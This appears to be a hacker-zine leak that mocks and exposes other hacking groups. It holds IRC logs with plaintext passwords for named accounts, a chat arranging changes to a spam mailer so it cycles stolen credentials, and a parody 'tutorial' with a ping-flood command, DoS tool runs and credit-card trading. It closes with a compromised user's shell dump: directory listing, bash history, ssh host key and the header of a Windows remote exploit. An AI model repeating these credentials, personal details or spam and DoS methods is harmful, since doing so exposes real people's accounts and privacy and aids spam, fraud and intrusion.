ROTLFMOA [MSGS ] [06:02pm] - arcanum arc@mall.pulltheplug.com that was from eris [SEND_MSG] [06:02pm] - arcanum [SEND_MSG] [08:08pm] - #hellman kndn@atlantis.io.com's password: : Knencv9* [SEND_MSG] [06:02pm] - arcanum [SEND_MSG] [08:08pm] - #hellman peery@password.io.com's password: : admin.io [SEND_MSG] [06:02pm] - arcanum [SEND_MSG] [08:08pm] - #hellman mdfranz@ssh.cisco.com's password: : l1nxrl2999 PTP, 3TH1C4L H4Q1NG. [SEND_MSG] [04:09pm] - #social SPAM > * [SEND_MSG] [04:09pm] - #social !!!!!!!!!! [SEND_MSG] [04:10pm] - #social arcanum woulda got PAID if he could finish jobs.. \; [SEND_MSG] [04:19pm] - #social i got more work [SEND_MSG] [04:19pm] - #social if you were interested [SEND_MSG] [04:19pm] - #social coding work i cant be bothered with [SEND_MSG] [04:19pm] - #social mods to existing apps [SEND_MSG] [04:20pm] - #social yes [SEND_MSG] [04:20pm] - #social just .c [SEND_MSG] [04:20pm] - #social apps are basic enoguh [SEND_MSG] [04:21pm] - arcanum example [SEND_MSG] [04:21pm] - arcanum : [SEND_MSG] [04:21pm] - arcanum i got a linux mailer [SEND_MSG] [04:21pm] - arcanum pretty clean code [SEND_MSG] [04:21pm] - arcanum w/ normal smtp protocl shit [SEND_MSG] [04:21pm] - arcanum e.g. [SEND_MSG] [04:21pm] - arcanum helo world [SEND_MSG] [04:21pm] - arcanum rcpt from: blah@blah.com [SEND_MSG] [04:21pm] - arcanum mail to: shit@shit.com [SEND_MSG] [04:21pm] - arcanum data [SEND_MSG] [04:22pm] - arcanum asdf asoif oaish dfoaih dfh fhsdoiadf [SEND_MSG] [04:22pm] - arcanum . [SEND_MSG] [04:22pm] - arcanum orwhatever the noral smtp protocol is [MSGS ] [04:22pm] - arcanum arc@mall.pulltheplug.com ok [SEND_MSG] [04:22pm] - arcanum need to change it to [SEND_MSG] [04:22pm] - arcanum helo world [SEND_MSG] [04:22pm] - arcanum user: loginname [SEND_MSG] [04:22pm] - arcanum pass: password [SEND_MSG] [04:22pm] - arcanum rcpt from: blah@blah.com [SEND_MSG] [04:22pm] - arcanum mail to: shit@shit.com [SEND_MSG] [04:22pm] - arcanum data [SEND_MSG] [04:22pm] - arcanum rest as per norm [MSGS ] [04:22pm] - arcanum arc@mall.pulltheplug.com that's a pretty easy change [MSGS ] [04:23pm] - arcanum arc@mall.pulltheplug.com where is username / pass specified [MSGS ] [04:23pm] - arcanum arc@mall.pulltheplug.com command line? [SEND_MSG] [04:23pm] - arcanum just gotta read in a random l/p combo from a external file [MSGS ] [04:23pm] - arcanum arc@mall.pulltheplug.com config file? [MSGS ] [04:23pm] - arcanum arc@mall.pulltheplug.com nod [MSGS ] [04:23pm] - arcanum arc@mall.pulltheplug.com not difficult [MSGS ] [04:23pm] - arcanum arc@mall.pulltheplug.com the application threaded? [SEND_MSG] [04:23pm] - arcanum yes [SEND_MSG] [04:23pm] - arcanum code is pretty straight forward i think from me looking at it [MSGS ] [04:24pm] - arcanum arc@mall.pulltheplug.com yea [MSGS ] [04:24pm] - arcanum arc@mall.pulltheplug.com how large [MSGS ] [04:24pm] - arcanum arc@mall.pulltheplug.com is the external file? [SEND_MSG] [04:24pm] - arcanum i duno .. anywhere from a few hundred to a few thousand [SEND_MSG] [04:24pm] - arcanum just read in a random one [MSGS ] [04:24pm] - arcanum arc@mall.pulltheplug.com lines? [MSGS ] [04:24pm] - arcanum arc@mall.pulltheplug.com nod [SEND_MSG] [04:25pm] - arcanum yes 1 per line [SEND_MSG] [04:25pm] - arcanum however you want the format [SEND_MSG] [04:25pm] - arcanum like [SEND_MSG] [04:25pm] - arcanum user:pass [SEND_MSG] [04:25pm] - arcanum or whatever doesnt matter [MSGS ] [04:25pm] - arcanum arc@mall.pulltheplug.com nod [MSGS ] [04:25pm] - arcanum arc@mall.pulltheplug.com just like [MSGS ] [04:25pm] - arcanum arc@mall.pulltheplug.com a function [MSGS ] [04:25pm] - arcanum arc@mall.pulltheplug.com than opens the file [MSGS ] [04:25pm] - arcanum arc@mall.pulltheplug.com jumps to a random line [MSGS ] [04:25pm] - arcanum arc@mall.pulltheplug.com reads user:pass into an array [SEND_MSG] [04:25pm] - arcanum ya [MSGS ] [04:25pm] - arcanum arc@mall.pulltheplug.com then uses them [MSGS ] [04:25pm] - arcanum arc@mall.pulltheplug.com well [SEND_MSG] [04:25pm] - arcanum probably on init() load them all into memory and then call a random one from memory when u actually sendmail() [SEND_MSG] [04:25pm] - arcanum or some shit [SEND_MSG] [04:26pm] - arcanum save opening the file 23983289 times a second [MSGS ] [04:26pm] - arcanum arc@mall.pulltheplug.com that's possible too [MSGS ] [04:26pm] - arcanum arc@mall.pulltheplug.com alot of memory might be used up though [MSGS ] [04:26pm] - arcanum arc@mall.pulltheplug.com i mean i could allocate it on the fly [SEND_MSG] [04:27pm] - arcanum its only like 1000 l/p combos to store in memory.. that cant be that much can it ? [MSGS ] [04:27pm] - arcanum arc@mall.pulltheplug.com ah [MSGS ] [04:27pm] - arcanum arc@mall.pulltheplug.com so it's a static number of entries? [SEND_MSG] [04:27pm] - arcanum yeah [SEND_MSG] [04:27pm] - arcanum in a .txt [MSGS ] [04:27pm] - arcanum arc@mall.pulltheplug.com would there ever be more than 1000 ? [SEND_MSG] [04:27pm] - arcanum well make it max 5000 or something [SEND_MSG] [04:27pm] - arcanum *shrug* [MSGS ] [04:27pm] - arcanum arc@mall.pulltheplug.com yea [MSGS ] [04:28pm] - arcanum arc@mall.pulltheplug.com if it wasn that [MSGS ] [04:28pm] - arcanum arc@mall.pulltheplug.com then i could like [MSGS ] [04:28pm] - arcanum arc@mall.pulltheplug.com make it a static array [SEND_MSG] [04:28pm] - arcanum list is static [MSGS ] [04:28pm] - arcanum arc@mall.pulltheplug.com smaller function [MSGS ] [04:28pm] - arcanum arc@mall.pulltheplug.com less calls [SEND_MSG] [04:28pm] - arcanum might change once a week or so [MSGS ] [04:28pm] - arcanum arc@mall.pulltheplug.com to malloc [SEND_MSG] [04:30pm] - arcanum that something that sounds like you could be intersetd in ? [MSGS ] [04:31pm] - arcanum arc@mall.pulltheplug.com sure [MSGS ] [04:31pm] - arcanum arc@mall.pulltheplug.com i mean [SEND_MSG] [04:31pm] - arcanum do you have time to do this is another thing [MSGS ] [04:31pm] - arcanum arc@mall.pulltheplug.com i dont need the src as of right now [MSGS ] [04:31pm] - arcanum arc@mall.pulltheplug.com i can work ont he function [MSGS ] [04:31pm] - arcanum arc@mall.pulltheplug.com is it functionalized? [MSGS ] [04:31pm] - arcanum arc@mall.pulltheplug.com is there an init() ? [SEND_MSG] [04:31pm] - arcanum i can give you the source [SEND_MSG] [04:31pm] - arcanum thats no probs [MSGS ] [04:32pm] - arcanum arc@mall.pulltheplug.com who wrote it for you? [SEND_MSG] [04:32pm] - arcanum you just cnat hand out the source to anyone else [SEND_MSG] [04:33pm] - arcanum kinda arrangement [MSGS ] [04:33pm] - arcanum arc@mall.pulltheplug.com yea [MSGS ] [04:33pm] - arcanum arc@mall.pulltheplug.com i dont do that [MSGS ] [04:33pm] - arcanum arc@mall.pulltheplug.com heh [SEND_MSG] [04:33pm] - arcanum www.kas.net.au/far/far.zip [MSGS ] [04:33pm] - arcanum arc@mall.pulltheplug.com sec [MSGS ] [04:34pm] - arcanum arc@mall.pulltheplug.com k [MSGS ] [04:35pm] - arcanum arc@mall.pulltheplug.com got it [SEND_MSG] [04:35pm] - arcanum k run it and it spawns a local web interface as well [SEND_MSG] [04:35pm] - arcanum default on port 8080 [SEND_MSG] [04:35pm] - arcanum so go to http://ip:8080/ [SEND_MSG] [04:35pm] - arcanum and u can see how it works [SEND_MSG] [04:35pm] - arcanum pretty straight forward [MSGS ] [04:35pm] - arcanum arc@mall.pulltheplug.com mofo is using host by name [MSGS ] [04:35pm] - arcanum arc@mall.pulltheplug.com if ((hp = gethostbyname(host)) == NULL) return (ARESOLVE); [MSGS ] [04:35pm] - arcanum arc@mall.pulltheplug.com wtf [MSGS ] [04:35pm] - arcanum arc@mall.pulltheplug.com .. [MSGS ] [04:36pm] - arcanum arc@mall.pulltheplug.com that's not thread safe [MSGS ] [04:36pm] - arcanum arc@mall.pulltheplug.com is this thing fast? [SEND_MSG] [04:36pm] - arcanum yes [MSGS ] [04:36pm] - arcanum arc@mall.pulltheplug.com interesting [MSGS ] [04:36pm] - arcanum arc@mall.pulltheplug.com ok [MSGS ] [04:36pm] - arcanum arc@mall.pulltheplug.com well [MSGS ] [04:36pm] - arcanum arc@mall.pulltheplug.com i guess you have your reasons for not asking him to add shit [MSGS ] [04:36pm] - arcanum arc@mall.pulltheplug.com :) [SEND_MSG] [04:36pm] - arcanum bysin wrote it [SEND_MSG] [04:37pm] - arcanum the one who writes all those worms that go around the net [SEND_MSG] [04:37pm] - arcanum i didnt get it form him directly [SEND_MSG] [04:38pm] - arcanum if thats an issue of whether i will pay [SEND_MSG] [04:38pm] - arcanum you can ask solarx [MSGS ] [04:38pm] - arcanum arc@mall.pulltheplug.com no [MSGS ] [04:38pm] - arcanum arc@mall.pulltheplug.com you've paid me before [SEND_MSG] [04:38pm] - arcanum every time hese done something for him ive paid him + tipped him as well [MSGS ] [04:39pm] - arcanum arc@mall.pulltheplug.com wow [MSGS ] [04:39pm] - arcanum arc@mall.pulltheplug.com this is beutiful [SEND_MSG] [04:40pm] - arcanum the web interface ? [SEND_MSG] [04:40pm] - arcanum or the code ? [MSGS ] [04:40pm] - arcanum arc@mall.pulltheplug.com the code [SEND_MSG] [04:40pm] - arcanum whats your email addy ? [MSGS ] [04:41pm] - arcanum arc@mall.pulltheplug.com dalvarez@gmail.com [MSGS ] [11:01am] - arcanum arc@mall.pulltheplug.com hehe [MSGS ] [11:01am] - arcanum arc@mall.pulltheplug.com arc@mall:~/projects/far$ !gcc [MSGS ] [11:01am] - arcanum arc@mall.pulltheplug.com gcc -o fahrenheit fahrenheit.c -lpthread -w [MSGS ] [11:01am] - arcanum arc@mall.pulltheplug.com arc@mall:~/projects/far$ !./ [MSGS ] [11:01am] - arcanum arc@mall.pulltheplug.com ./fahrenheit usb.fhm file [MSGS ] [11:01am] - arcanum arc@mall.pulltheplug.com Fahrenheit v8.0 [MSGS ] [11:01am] - arcanum arc@mall.pulltheplug.com Parsing configuration file... [ OK ] [MSGS ] [11:01am] - arcanum arc@mall.pulltheplug.com Parsing Login:Password Pairs... [ OK ] [MSGS ] [11:01am] - arcanum arc@mall.pulltheplug.com Setting system wide open file limit... [FAILED] [MSGS ] [11:01am] - arcanum arc@mall.pulltheplug.com Listening on port 6232... [ OK ] [MSGS ] [11:01am] - arcanum arc@mall.pulltheplug.com Going into the background, connect to the webserver by going to http://199.173.14.2:6232 [MSGS ] [11:01am] - arcanum arc@mall.pulltheplug.com 26 PAIRS READ IN [SEND_MSG] [11:15am] - arcanum cool [SEND_MSG] [11:19am] - arcanum does it work tho ? [MSGS ] [11:19am] - arcanum arc@mall.pulltheplug.com not finished [MSGS ] [11:20am] - arcanum arc@mall.pulltheplug.com and i wont know until you test it [MSGS ] [11:20am] - arcanum arc@mall.pulltheplug.com cuz i aint doing no spam runs on my machine S0 H3R3Z TH3 BR34KD0WN... K4S.N3T IS .AU PTP 1Z M0STLY .AU K4S.N3T SP4MZ L1K3 CR4ZY. PTP 1Z BR0K3. K4Z.N3T SP4MZ L1K3 CR4ZY. PTP C4N C0D3 SP4M T00LZ F0R K4Z.N3T.. 1F K4Z.N3T _D03ZNT T3LL 4NY0N3_!!! H0NO H4QZ. H0NO L4UGHZ@1RC CH4TZ H0NO RM'Z 100 GIGZ 0F 3M41L 4DDR3ZZ3Z, SP4M T00LZ, & 4LL TH3 B0X3Z. H0NO H0P3Z T0 BR1NG S0M3 S3NS3 T0 PTP M3MB3RZ. K4S.N3T M3MB3RZ 0N TH3 0TH3R H4ND R H0P3L3ZZ. PTP: QUIT H4Q1NG. Y0U SUQ @ 1T. QUIT SP4MM1NG T00, 0R W3 W1LL S3ND ZONE-H DDOS N3T T0 Y0UR IRCD!!!! 20.txt -~-~-~ how hack in pc by r4t ---- AEUhUEAhuEA helo frends this r4t im hear too say that ya im a haker n such AEUhUEAhuEA butt thats byond point--- i doing this 4 my frends like tal0n aka skew who seem to disppeareded???? u see i hack in to meny peple an i buy shell with cc AEUhUEAhuEA that how elite be after r4t teech u how!!!!!!! no bad guy hurt u coz u kno how hack yes???? rdy how to hack in computer tutoriel..... things i will cover----- 0. introducion 1. what internet is??? 2. how login to telnet??? ... wat telnet is??? 3. how trade cc??? 4. my hacker story pome 5. this is done AEUhUEAhuEA if u thnk this may b hard well ya it is AEUhUEAhuEA but relex coz i good techer rdy 2 tech u how AeUhEuUehHeu wel .br is hacker capitel of world an i from that so.................... here go -------------------------- what internet is??? --------------------------------- AEUhUEAhuEA internt is freedum freedum too hack it is allow u too tlk 2 peple and wel u can hack to vary vary good hack tool is internet!!!!!!!! AEUhUEAhuEA it is network allow u tooo wel i duno but it is big big big bgi big big netwerk kk??? -------------------------- how login to telnet??? ------------------------------ all .br hacker no telnet best tool for hack!! stuped usa hacker say no but usa hacker = bad AEUhUEAhuEA fuck u usa AEUhUEAhuEAEUhUEAhuEA!!!!!! telnet make u hack in comps coz u tipe r4t@redhat9:~$ telnet www.google.com yea wel mabe u mite not able to do gogle buttttttt u do other!!!!!!!!!!! :) u put in port like telnet www.google.com 22 i thnk mabe port 22 = hack port but mabe not duno :( :( :( this is zeroday methid of hack so u tell every1 AEUhUEAhuEA :) and hack hack hack u do thru port AEUhUEAhuEA coz ports r wut u hack!!!!!!!!!!! this wot all elite hacker do so u lissen too me u be elit AEUhUEAhuEA ok this extra 4 telnet but u hack hurt sum1 pc if u do ping r4t@redhat9:~$ ping -t -l 65535 www.google.com AEUhUEAhuEA they fucked :) :) :) :) :) now r4t show u how trade cc very good way to be hacker ---------------------------- how trade cc??? ----------------------------------- ok cc vary vary vary good 4 buy shell 2 hack with u go on efnet in hacker chanel need cc kk i give root 4 redhat9 then giv root on your pc and they trikked :) :) AEUhUEAhuEA 0k4y y0 3y3 g0t 4 cc f0r y0u plz plz plz i giv root on redhat pc for u hack with AEUhUEAhuEA i need bad kkkkk (i senser number coz i use :) :)) wh4tz th3 l0g1n cr3d3nt14LZ f0r th3 r3dh4t 9 b0x? i trik u AEUhUEAhuEA g1v3 0r 3y3'll pull & dr0p yu0r d0x ok ok ok ok AEUhUEAhuEA i sory **.***.**.*** l: root p: r4t n1c3 p4zzw0rd thank u i no its secure wot bout u wh4t3v3r f4g * r4t has left #creditcardzforlife (0wn3d) * ok that woz mistace didnt meen 2 post but my pc not let me dlete :( :( :( u sea how i bargin good???? now u go get cc n be hakker to AEUhUEAhuEA i make good deel on cc trade it vary vary sekere to use efnet but AIM beter AEUhUEAhuEA butt superhacker pay big time for calleng r4t fag :))) darpanet soon hack him thay good hacker to AEUhUEAhuEAEUhUEAhuEA cc number vary usefel for buy shell to hack with!!!!!!!! then telnet and u in 2 box u hack!!!!!!!! but when telnet honeypot u do r4t@redhat9:~$ ./telnet-dos -h www.google.com AEUhUEAhuEAEUhUEAhuEAEUhUEAhuEA thay fuck :)) xort do good job on telnet-dos.c thank :) :) :) but u want beter!!!!!!!!!!!! r4t@redhat9:~$ ./megaDoS -h www.google.com AEUhUEAhuEA thank u rotor astralien frend AEUhUEAhuEA ok now u want cc so u buy shell to hack frum kkkkk go aol instint mesinger chatrom nameded thisisnotcctradingchat thay vary trust i thare so u say hi :) :) if u want find version in ipv6!!!!!!!!!!!!!! o wate must look up for how compeil c program ok found AEUhUEAhuEA r4t@redhat9:~$ ./cb4n6 thank u rotor u big help AEUhUEAhuEA for scan cisco trade for cc u do perl c1zc0-mgx.pl vary vary good k thank u for reding cc totoriel ---------------------------- my hacker story pome ------------------------------ i am r4t uberhacker carolin meinel teech me how hack she good look womin so i fuck her she teehc me how compeil 0day i am happy hacker AEUhUEAhuEA she good hacker i am to i find friend like in movie hackers but i beter then zerocool AEUhUEAhuEA i lern qbasic i lern visal basic vary good hack lang i rite windows shell code in visal basic it make uhacked.txt AEUhUEAhuEA my name r4t cuz i sneeky like r4t u no find me when i hack u AEUhUEAhuEA my english not bad like peple say i take it for 6 year in high schol i stil in high scool AEUhUEAhuEA i hack u useng sub7 now u feer coz im elit u no mess with r4t AEUhUEAhuEA i hack .br sight with tal0n he good hacker to but not as good me AEUhUEAhuEA u no sea me enter u pc fuck AEUhUEAhuEA my name r4t i am ultimit hacker -------------------------- this is done AEUhUEAhuEA ------------------------ thank for reeding totoriel u wil becom good if u keep doing hack AEUhUEAhuEA if meet u and carolin meinol she teech vary well how hack and u becom good uberhacker AEUhUEAhuEAAEUhUEAhuEAAEUhUEAhuEAAEUhUEAhuEA she tell u it ok to put passwerd thru plain text protocal wotever that AEUhUEAhu but she smrt keep hack keep hack keep hack u get 0day trade cc# thx now i go play floot now u shood to cuz that hacker instrimint AEUhUEAhuEA AEUhUEAhuEAAEUhUEAhuEAAEUhUEAhuEAAEUhUEAhuEAAEUhUEAhuEAAEUhUEAhuEAAEUhUEAhuEAAEU AEUhUEAhuEAAEUhUEAhuEAAEUhUEAhuEAAEUhUEAhuEAAEUhUEAhuEAAEUhUEAhuEAAEUhUEAhuEAAEU KEEP HACKENG FUCK USA AEUhUEAhuEA end of feil or wotever AEUhUEAhuEA 21.txt -~-~-~ di0ad 1z t04zt3d w3 g0t th3 fbsd w4r3z fr0m a z0n3-h 4ffl1l14t3 4nd cl0s3 fr13nd 0f w00d'z. lucky f0r d104d 0ur fr13nd d1dnt h4v3 fbsd ruzz14n r0ul3tt3 sh3llc0de 0r y0ur wh0l3 l4n w0uld b3 l1nk d34d r1ght n0w. w3 st1ll l0v3 y0ur m0m di0ad!! d33pm4g1c rulezzZZzzZzz!!! sh-2.05b$ uname -a Linux core.joyservers.net 2.4.2 FreeBSD 5.4-RELEASE-p6 #0: Tue Aug 2 18:35:51 UTC 2005 i686 i686 i386 GNU/Linux sh-2.05b$ echo 'wh--h00, w3 g0t 0d4yz 4 th@' 'wh--h00, w3 g0t 0d4yz 4 th@' sh-2.05b$ w 9:34PM up 38 days, 2:02, 1 user, load averages: 0.07, 0.03, 0.01 USER TTY FROM LOGIN@ IDLE WHAT di0ad p0 pcp0010235481pcs 5:02AM 15:57 -bash (bash) sh-2.05b$ id uid=1014(di0ad) gid=1015(di0ad) groups=1015(di0ad) sh-2.05b$ ls -al /home/di0ad total 2684800 drwxr-xr-x 13 di0ad di0ad 1024 Dec 11 05:39 . drwx--x--x 21 root wheel 512 Dec 10 01:52 .. drwx------ 3 di0ad di0ad 512 Dec 11 21:07 .BitchX drwxr-xr-x 2 di0ad di0ad 512 Nov 19 2002 .Mantis -rw------- 1 di0ad di0ad 5238 Dec 12 02:54 .bash_history drwx------ 3 di0ad di0ad 512 Aug 11 04:15 .bittorrent -rw-r--r-- 1 di0ad di0ad 767 Aug 4 01:40 .cshrc drwx------ 2 di0ad di0ad 512 Aug 14 22:37 .irssi -rw-r--r-- 1 di0ad di0ad 248 Aug 4 01:40 .login -rw-r--r-- 1 di0ad di0ad 158 Aug 4 01:40 .login_conf -rw------- 1 di0ad di0ad 373 Aug 4 01:40 .mail_aliases -rw-r--r-- 1 di0ad di0ad 331 Aug 4 01:40 .mailrc -rw-r--r-- 1 di0ad di0ad 797 Aug 4 01:40 .profile -rw------- 1 di0ad di0ad 276 Aug 4 01:40 .rhosts -rw-r--r-- 1 di0ad di0ad 975 Aug 4 01:40 .shrc -rw------- 1 di0ad di0ad 24 Oct 4 07:49 .spamkey drwx------ 2 di0ad di0ad 512 Aug 13 03:04 .ssh drwxr-xr-x 2 di0ad di0ad 512 Dec 12 05:37 C -rw-r--r-- 1 di0ad di0ad 0 Aug 22 04:47 MO002.wmv -rw-r--r-- 1 di0ad di0ad 24745 Aug 22 04:47 MO002.wmv.torrent -rw-r--r-- 1 di0ad di0ad 29238 Aug 4 03:53 MantisBX1.4.tar.gz -rwxr-xr-x 1 root di0ad 85801 Aug 16 21:02 aircrack drwxr-xr-x 5 root di0ad 512 Aug 16 21:00 aircrack-2.21 -rw-r--r-- 1 root di0ad 228844 Aug 16 21:00 aircrack-2.21.tgz -rw-r--r-- 1 di0ad di0ad 2141 Aug 17 00:40 bah.rar drwxr-xr-x 10 di0ad di0ad 512 Dec 12 05:18 cyp -rw-r--r-- 1 di0ad di0ad 63000 Aug 4 03:51 cyp01kb2.tar.gz -rwxr-xr-x 1 di0ad di0ad 4876 Oct 15 03:22 fawk -rw-r--r-- 1 di0ad di0ad 52 Oct 15 03:22 fawk.c -rw-r--r-- 1 di0ad di0ad 363440606 Aug 14 07:56 irc.dickscab.tgz -rw-r--r-- 1 di0ad di0ad 24512911 Aug 16 20:47 kolb.cap -rwxr-xr-x 1 di0ad di0ad 15880 Aug 17 04:00 login -rw-r--r-- 1 di0ad di0ad 252108 Aug 17 00:39 m0d.rar -rw-r--r-- 1 di0ad di0ad 270006523 Aug 16 23:10 ms visual studio enterprise 6.0 With SP5 and Key.rar drwxr-xr-x 4 di0ad di0ad 512 Aug 17 03:52 ownage -rw-r--r-- 1 di0ad di0ad 2141 Aug 17 00:40 owns.rar drwxr-xr-x 6 di0ad di0ad 512 Aug 20 03:09 tmp drwxr-xr-x 2 di0ad di0ad 512 Oct 6 2003 tux-2.0 -rw-r--r-- 1 di0ad di0ad 12865 Aug 4 03:50 tux-2.0.tar.gz -rw-r--r-- 1 di0ad di0ad 55108 Aug 22 04:38 xf.torrent -rw-r--r-- 1 di0ad di0ad 714997760 Aug 22 09:35 xxx fr-la cambrioleuse-clara morgane.avi sh-2.05b$ cat /home/di0ad/.bash_history Session aborted cat john.pot $1$KYPEeOrw$khYXZnLnfFfMm15bNiNTA/:ruboard w who last -20 w ps ax top w exit w su - w su - screen -r w screen -r date w exit BitchX -H deepmagic.org di0aD irc.efnet.net BitchX -H deepmagic.org di0aD irc.efnet.net BitchX -H deepmagic.org di0aD irc.efnet.net w exit w screen -r w exit w ssh root@208.53.170.51 traceroute mcxnet.com w ps ax su - w ls pwd ls -s su - exit w su - w ls w top ls cd xbox ls ls -s btdownloadcurses.py Grand_Theft_Auto_San_Andreas-USA-XBOXDVD-DAGGER.torrent screen -S torrent screen -r w w screen -S torrent2 w exit w cd xbox ls cd Grand_Theft_Auto_San_Andreas-USA-XBOXDVD-DAGGER ls tar zxvf Grand_Theft_Auto_San_Andreas-XBOXFiX-READ_NFO-iND.tar ls -l cat gtasx-dgr.nfo ls cat gtasx-dgr.sfv ls -a w screen -r screen -r torrent screen -r torrent2 screen -r torrent screen -r 95084 pwd ls ls ls btdownloadcurses.py Grand_Theft_Auto_San_Andreas-USA-XBOXDVD-DAGGER.torrent lynx lynx lynx http://www.mininova.org/get/98240 btdownloadcurses.py hulk.torrent btdownloadcurses.py hulk.torrent pwd exit w ls cd xbox ls screen -r screen -r torrent2 screen -r torrent screen -r 95084 screen -S tor screen -S t3 w df -h w ls w last -20 screen -S fan4 screen -r screen -r torr screen -r screen -r tor screen -r 26955 screen -r screen -r t3 screen -r fan4 w ls ls screen -r screen -r tor screen -r fan4 screen -r to screen -r screen -r t3 screen -r tor2 screen -r tor screen -r 26955 w ls screen -r screen -r tpr screen -r tor screen -r torrrent2 screen -r torrent2 screen -r tor screen -r 26955 screen -r screen -r fan4 screen -r t3 w last -50 screen -S efnet w exit w whois ownz-you.com whois ownz-you.info whois ownz-you.info whois ocjnet.com whois ocjnet.org whois deepmagic.net screen -r screen -r efnet w ps ax screen -r t2 screen -r t3 screen -wipe screen -r ps ax scr-bx ps ax netstat -tan w su - screen -r w last -5 w exit who screeb w date cd /var/log ls dmesg dmesg|more ls cat security su - w ls w df -h su - BitchX -H WhoresR.US di0aD irc.efnet.net su - BitchX -H WhoresR.US di0aD irc.efnet.net BitchX -H WhoresR.US di0aD irc.efnet.net exit w screen -r screen -S efnet w exit w ls su - exit w su - su - screen -r ls cd xbox ls cd Brothers-In-Arms.torrent Brothers.In.Arms.XBOX-WAM Burnout 3 - Takedown Xbox USA Full DVD - Team USA Burnout3.torrent Fantastic 4 USA_XBOX Grand_Theft_Auto_San_Andreas-USA-XBOXDVD-DAGGER Grand_Theft_Auto_San_Andreas-USA-XBOXDVD-DAGGER.torrent Madden_NFL_06_Usa_Xbox-RiOT XBOX-The Incredible Hulk Ultimate Destruction USA FULLDVD XBOX-The.Incredible.Hulk.Ultimate.Destruction.USA.FULLDVD.torrent doa3.iso doa3.iso.torrent fan4.torrent hulk.torrent madden06.torrent ps w top ps aux w exit w su - exit w cd /usr ls cd xbox ls cd /usr/home ls su - screen -r w exit w ps ax w top w date ls last -5 w dmesg ls df -h ifconfig w ls w ls screen -r screen -wipe screen -S efnet w exit w su - w screen -r w exit w screen -r w exit w last -20 screen -r w exit w gcc -v nano fawk.c nano fawk.c gcc -o fawk fawk.c nano fawk.c gcc -o fawk fawk.c ./fawk cat fawk.c ./fawk ls w ls uname -a man uname uname -X uname -i uname -p ps ps ax ps aux dmesg w exit w su - screen -r nslookup soft.kongju.ac.kr whois -h whois.apnic.org 203.253.42.77 whois -h whois.nic.or.kr 203.253.42.77 lynx ftp://www.kernel.org/pub/ ls su - screen -r BitchX -H deepmagic.org di0aD irc.undernet.org BitchX -H whoresr.us di0aD irc.undernet.org exit w screen -r screen -r su - exit w ls screen -r BitchX -H whoresr.us di0aD irc.dextroverse.org screen -r BitchX -H whoresr.us di0aD irc.dextroverse.org BitchX -H whoresr.us di0aD dextroverse.mine.nu screen -r screen -r w top ps ps ax ps ax|grep httpd w su - BitchX -H deepmagic.org di0aD irc.rizon.net exit su - screen -r w screen -r su - exit w whois ownz-you.com exit w whois 69.42.68.184 traceroute 69.42.68.184 traceroute www.yahoo.com who traceroute 68.47.124.194 ping www.yahoo.com su - screen -r pwd cd /usr/xbox ls mkdir movie cd movie exit BitchX -H deepmagic.org di0aD irc.rizon.net exit w ls lynx http://www.mininova.org/tor/125058 su - screen -r screen -S rizon screen -r su - BitchX w su - w last -5 w last -5 screen -r w last -20 w su - screen -r su - screen -r whois deepmagic.net screen -r ping www.goinfantry.com w w su - w w ps ax|grep ident su - ps ax|grep ident screen -r screen -wipe screen -S efnet w last -20 screen -r nslookup ns1.inwood.cc host -t NS inwood.cc whois inwood.cc whois inwood.cc screen -r w exit w traceroute su - w ls su - exit w ps ax ps ax|grep httpd cd /etc/init.d/ ls ./httpd start su - screen -r w host -t NS crysis.net nslookup 208.53.135.200 host -t NS 208.53.135.200 su - exit BitchX -H twlc.info di0aD irc.undernet.org BitchX -H twlc.info di0aD irc.freenode.net w w screen -r su - pwd cd /tmp ls cat art.txt ls cat mysql.sock cat done.txt ls cd rdx-session-0.665204330653982 cat rdx-session-0.665204330653982 ls ls -a cd pear ls cd cache/ ls ls -l cd lynx http://www.milw0rm.com/id.php?id=1337 ls su - exit w last -5 last -20 w date screen -r w exit screen -r cat /etc/passwd su - exit w last -20 screen -S bx screen -r exit w screen -r screen -r bx exit w screen -r w ls cd C mkdir C cd C ls nano p1.c gcc -o p1 p1.c ls ./p1 cat p1 ls cat p1.c ./p1 screen -r screen -r bx screen -r bx W3 H4D A BL4ZT 4DD1NG R4ND0M B1TZ T0 H1Z .R4R F1L3Z. H0P3 Y0U D1DNT SP3ND T00 L0NG D0WNL04D1NG TH3M. H4R H4R H4R!@# sh-2.05b$ cat /home/di0ad/.ssh/known_hosts mcxnet.com ssh-dss AAAAB3NzaC1kc3MAAACBAMUEmiZWiuizz/Bp6MWJcmmGMnlQMx9F/YcGEWNGJfMeSrnLiYr3uY2dYAB/IHVJVHQOsE/gy41OsQ9uziHM/BHcMBu+Vo7mRKfyu4Q5ugfBHdUdQdhizXwdcM+QEzKVL8dVEzD7izaFxHwKTLGzYKcW8IhP5cfsBMFgPsY2aIstAAAAFQCSm4AMntWMMGSuBpuEa5WFou5UFQAAAIABkWQ2GiWvQzSB1o4+ycp1lNlYijRCrcwcMB8F0aJgz9j0Y4rt2kNCw3NZ8+rktKBGSepHIkgC7Zbvi8DXIpESbrGUNTxKe9zjcJRAQU/YsIwV+W86a1XGSZhfUhmOd64AzgVvsNrVlu42kqSQgmFnaQyzLxtA2MOm3SSA69JtfgAAAIANJECDwQqYESsfASkZfjHCFWzVklvajh/IJJ7YCRTaBUDQFL0m52S1dMnkeorP7EujtaS65AbudAzDWfHiUN47ud3ckYDsBsWOtE0eNLOWJS6O0oPtvWlPGRwb55GqhlCnqPqYISKf8kJtIL6KZY0RXrNNxA1gw1kQjFH2gQxqpA== sh-2.05b$ ls -al /home/di0ad/ownage total 340 drwxr-xr-x 4 di0ad di0ad 512 Aug 17 03:52 . drwxr-xr-x 13 di0ad di0ad 1024 Dec 11 05:39 .. drwxr-xr-x 5 di0ad di0ad 512 May 10 2004 sk -rwx------ 1 di0ad di0ad 165828 Aug 13 03:04 sk2-0x557-modified.tgz drwxr-xr-x 2 di0ad di0ad 512 Aug 14 14:51 windows sh-2.05b$ ls -al /home/di0ad/ownage/windows total 60 drwxr-xr-x 2 di0ad di0ad 512 Aug 14 14:51 . drwxr-xr-x 4 di0ad di0ad 512 Aug 17 03:52 .. -rwxr-xr-x 1 di0ad di0ad 9986 Aug 14 14:51 039 -rw-r--r-- 1 di0ad di0ad 14522 Aug 14 14:51 039.c sh-2.05b$ head -n9 /home/di0ad/ownage/windows/02 39.c /* HOD-ms05039-pnp-expl.c: 2005-08-10: PUBLIC v.0.2 * * Copyright (c) 2005 houseofdabus. * * (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow * Universal Exploit + no crash shellcode * * * sh-2.05b$ cat /home/di0ad/fawk.c #include main() { printf("fawkers\n"); } sh-2.05b$ 